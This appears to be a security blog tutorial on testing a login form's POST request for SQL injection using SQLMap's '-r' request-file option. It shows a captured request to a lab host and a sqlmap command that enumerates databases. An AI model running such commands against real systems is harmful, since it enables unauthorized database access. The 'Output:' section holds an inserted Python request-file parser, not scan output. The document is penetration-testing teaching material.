Author: Arnel C. Reyes
Published: 30 July 2024
Last Updated: 31 July 2024
SQLMap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities in web applications. It is one of the most popular tools used by security professionals for identifying and leveraging SQL injection points to gain unauthorized access to databases.
What is a POST Request?
In web applications, a POST request is used to send data to the server to create/update a resource. The data sent to the server is stored in the request body of the HTTP request. SQLMap can be used to test POST requests to identify SQL injection vulnerabilities by sending malicious payloads in the request body.
What is a Request File?
A request file contains the entire HTTP request, including the request line, headers, and body. This file is typically captured using tools like Burp Suite, OWASP ZAP, or even by saving HTTP requests from browser developer tools.
Steps to Use SQLMap with a Request File
- Capture the request using a tool like Burp Suite or OWASP ZAP, which records the full HTTP request.
» Consider that the following request has been captured:
POST /index.php?page=login.php HTTP/1.1
Host: 192.168.1.18
Cookie: PHPSESSID=7f5i8fc4eke2pckj7o38gdks58; showhints=1
Content-Length: 65
Cache-Control: max-age=0
Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
Origin: https://192.168.1.18
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://192.168.1.18/index.php?page=login.php
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive
username=username&password=password&login-php-submit-button=Login
- Save the captured request to a file (e.g., 'post-request.txt').
- Run SQLMap with the '-r' option to specify the request file.
» Execute SQLMap with the '-r' option, specifying the request file as follows:
$ python sqlmap.py -r post-request.txt -p username,password --dbs --dbms="MySQL" --output-dir=output
Output:
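As an added example (not code from the original post or from the sqlmap project), here is a small Python parser for the request-file format described above: it reads the captured request, lists the body parameters that the '-p' option names, and flags two things worth checking before the scan, a body length that no longer matches Content-Length (a truncated capture) and an HTTPS Origin/Referer, which means sqlmap's --force-ssl option is needed because the request line itself carries no scheme. The sample request is a trimmed copy of the capture above; the function names are assumptions of this example.

```python
from urllib.parse import parse_qsl

# Constructed sample: the request captured in this post, trimmed to the
# headers the checks below use. A blank line separates headers from body.
SAMPLE_REQUEST = """POST /index.php?page=login.php HTTP/1.1
Host: 192.168.1.18
Cookie: PHPSESSID=7f5i8fc4eke2pckj7o38gdks58; showhints=1
Content-Length: 65
Origin: https://192.168.1.18
Content-Type: application/x-www-form-urlencoded
Referer: https://192.168.1.18/index.php?page=login.php

username=username&password=password&login-php-submit-button=Login
"""

def parse_request_file(text):
    """Split a raw HTTP request (the format sqlmap -r reads) into request line,
    headers (names lower-cased, as HTTP header names are case-insensitive) and body."""
    head, _, body = text.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body.rstrip("\n")}

def injectable_parameters(req):
    """Body parameter names sqlmap would test, i.e. the candidates for -p."""
    ctype = req["headers"].get("content-type", "")
    if not ctype.startswith("application/x-www-form-urlencoded"):
        return []
    return [name for name, _ in parse_qsl(req["body"], keep_blank_values=True)]

def check_request(req):
    """Sanity checks worth running on a capture before handing it to sqlmap -r."""
    problems = []
    declared = req["headers"].get("content-length")
    if declared is not None and int(declared) != len(req["body"].encode()):
        problems.append("body length differs from Content-Length (truncated capture?)")
    # The request line carries no scheme and sqlmap -r assumes http:// by default,
    # so an HTTPS Origin/Referer means the scan needs --force-ssl.
    if any(req["headers"].get(h, "").startswith("https://") for h in ("origin", "referer")):
        problems.append("capture came over HTTPS; run sqlmap with --force-ssl")
    return problems
```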
Conclusion
Using SQLMap to test POST requests for SQL injection vulnerabilities is a critical aspect of web application security testing. By automating the process, SQLMap allows security professionals to efficiently identify and exploit SQL injection points, helping to ensure the robustness of web applications against such attacks. The `-r` option is a powerful method for testing complex HTTP requests: by capturing and replaying the full HTTP request, security professionals can ensure that every part of the request (cookies, headers and body alike) is tested as the browser actually sent it, improving the chances of identifying potential vulnerabilities. Always ensure you have proper authorization before testing any web application, to avoid legal consequences.
Reference
https://sqlmap.org
Disclaimer: This documentation is intended for educational purposes only. The content provided herein is meant to inform and educate individuals about security practices, techniques, and tools. Security-Science does not support, endorse, or encourage any illegal or unethical activities, including but not limited to unauthorized access to computer systems, networks, or data. Users are advised to apply the knowledge gained responsibly and ensure compliance with all applicable laws and regulations. Security-Science shall not be held liable for any misuse of the information provided.